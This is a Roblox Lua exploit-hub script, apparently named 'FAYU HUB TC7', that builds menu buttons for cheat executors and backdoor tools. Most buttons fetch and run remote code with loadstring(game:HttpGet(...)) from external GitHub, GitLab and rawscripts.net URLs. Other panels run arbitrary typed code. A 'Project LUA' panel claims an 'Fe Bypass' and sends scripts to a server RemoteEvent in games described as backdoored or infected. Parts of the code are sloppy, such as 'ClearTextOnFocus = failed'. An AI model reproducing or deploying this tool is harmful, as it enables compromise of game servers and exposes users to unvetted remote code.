local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))() local Window = Library.CreateLib("FAYU HUB TC7", "DarkTheme") local Tab = Window:NewTab("EXECTOR") local Section = Tab:NewSection("Script") Section:NewButton("unrestricted Script exector", "ButtonInfo", function() loadstring(game:HttpGet("https://gitlab.com/susmic/unrestricted-script-executor/-/raw/main/usi.lua",true))() print("Clicked") end) Section:NewButton("Backdoor exec v67 patched", "ButtonInfo", function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Backdoor-exec-v67-made-by-me-19508"))() print("Clicked") end) Section:NewButton("Dominant Executor", "ButtonInfo", function() local gui = Instance.new("ScreenGui") gui.Name = "support mobile" gui.Parent = game.CoreGui local Frame = Instance.new("Frame") Frame.Size = UDim2.new(0.7, 0, 0.9, 69) Frame.Position = UDim2.new(0.1, 0, 0.0, 0) Frame.BackgroundColor3 = Color3.new(1, 1, 1) Frame.BorderColor3 = Color3.new(0, 0, 0) Frame.BorderSizePixel = 0 Frame.Active = true Frame.BackgroundTransparency = 0 Frame.Draggable = true Frame.Parent = gui local ImageLabel = Instance.new("ImageLabel") ImageLabel.Size = UDim2.new(0.9, 53, 0.9, 36) ImageLabel.Position = UDim2.new(0.0, 0, 0.0, 0) ImageLabel.BackgroundColor3 = Color3.new(0, 0, 0) ImageLabel.ImageColor3 = Color3.new(1, 1, 1) ImageLabel.Image = "rbxassetid://70496556629822" ImageLabel.ImageTransparency = 0 ImageLabel.Parent = Frame ImageLabel.BackgroundTransparency = 1 local TextBox = Instance.new("TextBox") TextBox.Size = UDim2.new(0.7, 29, 0.5, 19) TextBox.Position = UDim2.new(0.0, 23, 0.1, 15) TextBox.BackgroundColor3 = Color3.new(0, 0, 0) TextBox.BorderColor3 = Color3.new(0, 0, 0) TextBox.BorderSizePixel = 0 TextBox.Text = "" TextBox.TextColor3 = Color3.new(0, 0, 0) TextBox.BackgroundTransparency = 1 TextBox.Font = Enum.Font.Code TextBox.TextSize = 15 TextBox.Parent = Frame TextBox.TextYAlignment = Enum.TextYAlignment.Top TextBox.TextXAlignment = Enum.TextXAlignment.Left TextBox.ClearTextOnFocus = failed TextBox.MultiLine = true TextBox.TextWrapped = true local Output = Instance.new("TextBox") Output.Size = UDim2.new(0.5, 31, 0.2, 16) Output.Position = UDim2.new(0.2, 19, 0.7, 5) Output.BackgroundColor3 = Color3.new(0, 0, 0) Output.BorderColor3 = Color3.new(0, 0, 0) Output.BorderSizePixel = 0 Output.Text = "[IDE]: Hello Hackerman, Usename" Output.TextColor3 = Color3.new(0, 0, 0) Output.BackgroundTransparency = 1 Output.Font = Enum.Font.Code Output.TextSize = 15 Output.Parent = Frame Output.TextYAlignment = Enum.TextYAlignment.Top Output.TextXAlignment = Enum.TextXAlignment.Left Output.ClearTextOnFocus = failed Output.MultiLine = true Output.TextWrapped = true local exe = Instance.new("TextButton") exe.Size = UDim2.new(0.2, 4, 0.0, 22) exe.Position = UDim2.new(0.0, 8, 0.7, 5) exe.BackgroundColor3 = Color3.new(0, 0, 0) exe.BorderColor3 = Color3.new(0, 0, 0) exe.BorderSizePixel = 0 exe.Text = "" exe.BackgroundTransparency = 1 exe.TextColor3 = Color3.new(255, 255, 255) exe.Font = Enum.Font.Code exe.Parent = Frame exe.MouseButton1Click:Connect(function() assert(loadstring(TextBox.Text))() end) local clea = Instance.new("TextButton") clea.Size = UDim2.new(0.2, 4, 0.0, 22) clea.Position = UDim2.new(0.0, 8, 0.8, 0) clea.BackgroundColor3 = Color3.new(0, 0, 0) clea.BorderColor3 = Color3.new(0, 0, 0) clea.BorderSizePixel = 0 clea.Text = "" clea.BackgroundTransparency = 1 clea.TextColor3 = Color3.new(255, 255, 255) clea.Font = Enum.Font.Code clea.Parent = Frame clea.MouseButton1Click:Connect(function() TextBox.Text = "" end) local Fileide = Instance.new("TextButton") Fileide.Size = UDim2.new(0.2, 4, 0.0, 22) Fileide.Position = UDim2.new(0.0, 8, 0.8, 28) Fileide.BackgroundColor3 = Color3.new(0, 0, 0) Fileide.BorderColor3 = Color3.new(0, 0, 0) Fileide.BorderSizePixel = 0 Fileide.Text = "" Fileide.BackgroundTransparency = 1 Fileide.TextColor3 = Color3.new(255, 255, 255) Fileide.Font = Enum.Font.Code Fileide.Parent = Frame Fileide.MouseButton1Click:Connect(function() local gui = Instance.new("ScreenGui") gui.Name = "file" gui.Parent = game.CoreGui local file = Instance.new("Frame") file.Size = UDim2.new(0.7, 0, 0.9, 59) file.Position = UDim2.new(0.2, 0, 0.0, 0) file.BackgroundColor3 = Color3.new(1, 1, 1) file.BorderColor3 = Color3.new(0, 0, 0) file.BorderSizePixel = 0 file.Active = true file.BackgroundTransparency = 1 file.Draggable = true file.Parent = gui local file1 = Instance.new("ImageLabel") file1.Size = UDim2.new(0.9, 53, 0.9, 35) file1.Position = UDim2.new(0.0, 0, 0.0, 0) file1.BackgroundColor3 = Color3.new(0, 0, 0) file1.ImageColor3 = Color3.new(1, 1, 1) file1.Image = "rbxassetid://86799294221744" file1.ImageTransparency = 0 file1.Parent = file file1.BackgroundTransparency = 1 local bir = Instance.new("TextButton") bir.Size = UDim2.new(0.8, 0, 0.0, 14) bir.Position = UDim2.new(0.1, 49, 0.8, 24) bir.BackgroundColor3 = Color3.new(0, 0, 0) bir.BorderColor3 = Color3.new(0, 0, 0) bir.BorderSizePixel = 0 bir.Text = "" bir.BackgroundTransparency = 1 bir.TextColor3 = Color3.new(255, 255, 255) bir.Font = Enum.Font.Code bir.Parent = file bir.MouseButton1Click:Connect(function() TextBox.Text = "loadstring(game:HttpGet('https://raw.githubusercontent.com/ryand56/Scripts/refs/heads/Scripts/Wings.txt'))()" file:Remove() end) local Xfile = Instance.new("TextButton") Xfile.Size = UDim2.new(0.0, 25, 0.0, 25) Xfile.Position = UDim2.new(0.9, 28, 0.0, 0) Xfile.BackgroundColor3 = Color3.new(0, 0, 0) Xfile.BorderColor3 = Color3.new(0, 0, 0) Xfile.BorderSizePixel = 0 Xfile.Text = "" Xfile.BackgroundTransparency = 1 Xfile.TextColor3 = Color3.new(255, 255, 255) Xfile.Font = Enum.Font.Code Xfile.Parent = file Xfile.MouseButton1Click:Connect(function() file:Remove() end) end) local X = Instance.new("TextButton") X.Size = UDim2.new(0.0, 29, 0.0, 25) X.Position = UDim2.new(0.9, 19, 0.0, 0) X.BackgroundColor3 = Color3.new(0, 1, 0) X.BorderColor3 = Color3.new(0, 0, 0) X.BorderSizePixel = 0 X.Text = "" X.BackgroundTransparency = 1 X.TextColor3 = Color3.new(255, 255, 255) X.Font = Enum.Font.Code X.Parent = Frame X.MouseButton1Click:Connect(function() Frame:Remove() end) local Orbit = Instance.new("ImageLabel") local ImageLel = Instance.new("ImageLabel") ImageLel.Size = UDim2.new(0.1, 19, 0.3, 0) ImageLel.Position = UDim2.new(-0.127000004, 0, 0.407999992, 0) ImageLel.BackgroundColor3 = Color3.new(0, 0, 0) ImageLel.ImageColor3 = Color3.new(1, 1, 1) ImageLel.Image = "rbxassetid://139336001646889" ImageLel.ImageTransparency = 0 ImageLel.Parent = gui ImageLel.BackgroundTransparency = 1 Orbit.Size = UDim2.new(0.1, 39, 0.3, 19) Orbit.Position = UDim2.new(-0.127000004, 0, 0.407999992, 0) Orbit.BackgroundColor3 = Color3.new(0, 0, 0) Orbit.ImageColor3 = Color3.new(1, 1, 1) Orbit.Image = "rbxassetid://139019879823094" Orbit.ImageTransparency = 0 Orbit.Parent = gui Orbit.BackgroundTransparency = 1 ImageLel:TweenPosition(UDim2.new(0.458, 0, 0.408, 0), "Out", "Linear", 0.4, false) Orbit:TweenPosition(UDim2.new(0.446, 0, 0.379, 0), "Out", "Linear", 0.4, false) wait(3) Orbit:TweenPosition(UDim2.new(0.00, 0, 0.59, 0), "Out", "Sine", 0.7, false) ImageLel:TweenPosition(UDim2.new(0.00, 10, 0.62, 0), "Out", "Sine", 0.7, false) while wait() do Orbit.Rotation = Orbit.Rotation + 1 end print("Clicked") end) Section:NewButton("backdoor legacy", "BACKDOOR SCRIPT", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/IvanTheProtogen/BackdoorLegacy/main/main.lua'))() print("Clicked") end) Section:NewButton("Sypaze X alpha V0.0.1", "ButtonInfo", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/max96git/max96git-s-stuff/main/sypz/loader.lua",true))() print("Clicked") end) local Tab = Window:NewTab("backdoor") local Section = Tab:NewSection("Script") Section:NewButton("project LUA", "ButtonInfo", function() game:GetService("StarterGui"):SetCore("DevConsoleVisible", true) print("Installing Project LUA...") wait(2) print("Project LUA installed..") wait(2) warn("Enjoy Fe Bypass!1") wait(2) local sound = Instance.new("Sound", game.Workspace) sound.SoundId = "rbxassetid://8623387557" sound.Volume = 39 sound:Play() local screenGui = Instance.new("ScreenGui") screenGui.Name = "Project LUA" screenGui.ResetOnSpawn = false screenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") local mainFrame = Instance.new("Frame") mainFrame.Name = "MainFrame" mainFrame.Size = UDim2.new(0, 500, 0, 300) mainFrame.Position = UDim2.new(0.5, -250, 0.3, 0) mainFrame.BackgroundColor3 = Color3.fromRGB(240, 240, 240) mainFrame.BorderSizePixel = 0 mainFrame.Active = true mainFrame.Draggable = true mainFrame.Parent = screenGui local topBar = Instance.new("Frame") topBar.Size = UDim2.new(1, 0, 0, 40) topBar.BackgroundColor3 = Color3.fromRGB(200, 200, 200) topBar.BorderSizePixel = 0 topBar.Parent = mainFrame local logoImage = Instance.new("ImageLabel") logoImage.Size = UDim2.new(0, 30, 0, 30) logoImage.Position = UDim2.new(0, 10, 0.5, -15) logoImage.BackgroundTransparency = 1 logoImage.Image = "rbxassetid://122476991013968" logoImage.Parent = topBar local titleLabel = Instance.new("TextLabel") titleLabel.Size = UDim2.new(0, 200, 1, 0) titleLabel.Position = UDim2.new(0, 50, 0, 0) titleLabel.BackgroundTransparency = 1 titleLabel.Text = "Project LUA" titleLabel.Font = Enum.Font.SourceSansBold titleLabel.TextSize = 20 titleLabel.TextColor3 = Color3.fromRGB(50, 50, 50) titleLabel.TextXAlignment = Enum.TextXAlignment.Left titleLabel.Parent = topBar local minimizeButton = Instance.new("TextButton") minimizeButton.Size = UDim2.new(0, 30, 0, 30) minimizeButton.Position = UDim2.new(1, -90, 0.5, -15) minimizeButton.BackgroundTransparency = 1 minimizeButton.Text = "-" minimizeButton.TextColor3 = Color3.fromRGB(50, 50, 50) minimizeButton.Font = Enum.Font.SourceSans minimizeButton.TextSize = 20 minimizeButton.BorderSizePixel = 0 minimizeButton.Parent = topBar minimizeButton.MouseButton1Click:Connect(function() mainFrame.Visible = false end) local maximizeButton = Instance.new("TextButton") maximizeButton.Size = UDim2.new(0, 30, 0, 30) maximizeButton.Position = UDim2.new(1, -60, 0.5, -15) maximizeButton.BackgroundTransparency = 1 maximizeButton.Text = "â–¡" maximizeButton.TextColor3 = Color3.fromRGB(50, 50, 50) maximizeButton.Font = Enum.Font.SourceSans maximizeButton.TextSize = 18 maximizeButton.BorderSizePixel = 0 maximizeButton.Parent = topBar maximizeButton.MouseButton1Click:Connect(function() print("") end) local closeButton = Instance.new("TextButton") closeButton.Size = UDim2.new(0, 30, 0, 30) closeButton.Position = UDim2.new(1, -30, 0.5, -15) closeButton.BackgroundTransparency = 1 closeButton.Text = "X" closeButton.TextColor3 = Color3.fromRGB(0, 0, 0) closeButton.Font = Enum.Font.SourceSans closeButton.TextSize = 18 closeButton.BorderSizePixel = 0 closeButton.Parent = topBar closeButton.MouseButton1Click:Connect(function() screenGui:Destroy() end) local inputFrame = Instance.new("ScrollingFrame") inputFrame.Size = UDim2.new(1, -20, 0, 180) inputFrame.Position = UDim2.new(0, 10, 0, 50) inputFrame.BackgroundColor3 = Color3.fromRGB(245, 245, 245) inputFrame.BorderSizePixel = 0 inputFrame.CanvasSize = UDim2.new(0, 0, 0, 0) inputFrame.ScrollBarThickness = 5 inputFrame.ScrollBarImageTransparency = 1 inputFrame.Parent = mainFrame local lineFrame = Instance.new("Frame") lineFrame.Size = UDim2.new(0, 50, 1, 0) lineFrame.BackgroundColor3 = Color3.fromRGB(230, 230, 230) lineFrame.BorderSizePixel = 0 lineFrame.Parent = inputFrame local scriptBox = Instance.new("TextBox") scriptBox.Size = UDim2.new(1, -60, 1, 0) scriptBox.Position = UDim2.new(0, 60, 0, 0) scriptBox.BackgroundTransparency = 1 scriptBox.Text = "" scriptBox.TextColor3 = Color3.fromRGB(50, 50, 50) scriptBox.TextSize = 16 scriptBox.Font = Enum.Font.Code scriptBox.TextXAlignment = Enum.TextXAlignment.Left scriptBox.TextYAlignment = Enum.TextYAlignment.Top scriptBox.ClearTextOnFocus = false scriptBox.MultiLine = true scriptBox.TextWrapped = true scriptBox.TextEditable = true scriptBox.Parent = inputFrame local lineNumbers = Instance.new("TextLabel") lineNumbers.Size = UDim2.new(1, -10, 1, 0) lineNumbers.BackgroundTransparency = 1 lineNumbers.Text = "1" lineNumbers.Font = Enum.Font.Code lineNumbers.TextSize = 16 lineNumbers.TextColor3 = Color3.fromRGB(150, 150, 150) lineNumbers.TextXAlignment = Enum.TextXAlignment.Right lineNumbers.TextYAlignment = Enum.TextYAlignment.Top lineNumbers.Position = UDim2.new(0, 10, 0, 0) lineNumbers.Parent = lineFrame scriptBox:GetPropertyChangedSignal("Text"):Connect(function() local lines = scriptBox.Text:split("\n") local lineText = "" for i = 1, #lines do lineText = lineText .. tostring(i) .. "\n" end lineNumbers.Text = lineText inputFrame.CanvasSize = UDim2.new(0, 0, 0, #lines * 20) end) local buttonFrame = Instance.new("Frame") buttonFrame.Size = UDim2.new(1, -20, 0, 50) buttonFrame.Position = UDim2.new(0, 10, 0, 240) buttonFrame.BackgroundTransparency = 1 buttonFrame.Parent = mainFrame local buttonNames = {"EXE", "CLEAR", "INJECT"} for i, name in ipairs(buttonNames) do local button = Instance.new("TextButton") button.Size = UDim2.new(0, 100, 1, 0) button.Position = UDim2.new(0, (i - 1) * 110, 0, 0) button.BackgroundColor3 = Color3.fromRGB(220, 220, 220) button.Text = name button.TextColor3 = Color3.fromRGB(0, 0, 0) button.Font = Enum.Font.SourceSansBold button.TextSize = 18 button.BorderSizePixel = 0 button.Parent = buttonFrame if name == "EXE" then button.MouseButton1Click:Connect(function() local scriptText = scriptBox.Text local success, err = pcall(function() local func = loadstring(scriptText) if func then func() else error("Script could not be loaded.") end end) if not success then warn("Error: " .. err) end end) elseif name == "CLEAR" then button.MouseButton1Click:Connect(function() scriptBox.Text = "" end) elseif name == "INJECT" then button.MouseButton1Click:Connect(function() local scriptText = scriptBox.Text if scriptText and scriptText ~= "" then game.ReplicatedStorage.RemoteEvent:FireServer(scriptText) else warn("please inject a require if game backdoored/infected.") end end) end end local LuaProject = Instance.new("Frame") LuaProject.Size = UDim2.new(0, 500, 0, 300) LuaProject.BackgroundTransparency = 1 LuaProject.Parent = screenGui local ImageLabel = Instance.new("ImageLabel") ImageLabel.Parent = LuaProject ImageLabel.Active = true ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BackgroundTransparency = 1.000 ImageLabel.Position = UDim2.new(-0.127, 0, 0.408, 0) ImageLabel.Size = UDim2.new(0, 90, 0, 90) ImageLabel.Image = "rbxassetid://77238978008692" local function DSSE_fake_script() local script = Instance.new('LocalScript', LuaProject) local img = script.Parent.ImageLabel local TweenService = game:GetService("TweenService") local moveTweenInfo = TweenInfo.new(1, Enum.EasingStyle.Linear, Enum.EasingDirection.Out) local moveToCornerTween = TweenService:Create(img, moveTweenInfo, {Position = UDim2.new(0.01, 0, 0.813, 0)}) wait(1) img:TweenPosition(UDim2.new(0.458, 0, 0.408, 0), "Out", "Linear", 0.4, false) wait(3) moveToCornerTween:Play() moveToCornerTween.Completed:Wait() local slowSpinTweenInfo = TweenInfo.new(15, Enum.EasingStyle.Linear, Enum.EasingDirection.InOut, -1) local slowSpinTween = TweenService:Create(img, slowSpinTweenInfo, {Rotation = 360}) slowSpinTween:Play() wait(2) img:TweenTransparency(1, 0.4) end coroutine.wrap(DSSE_fake_script)() print("Clicked") end)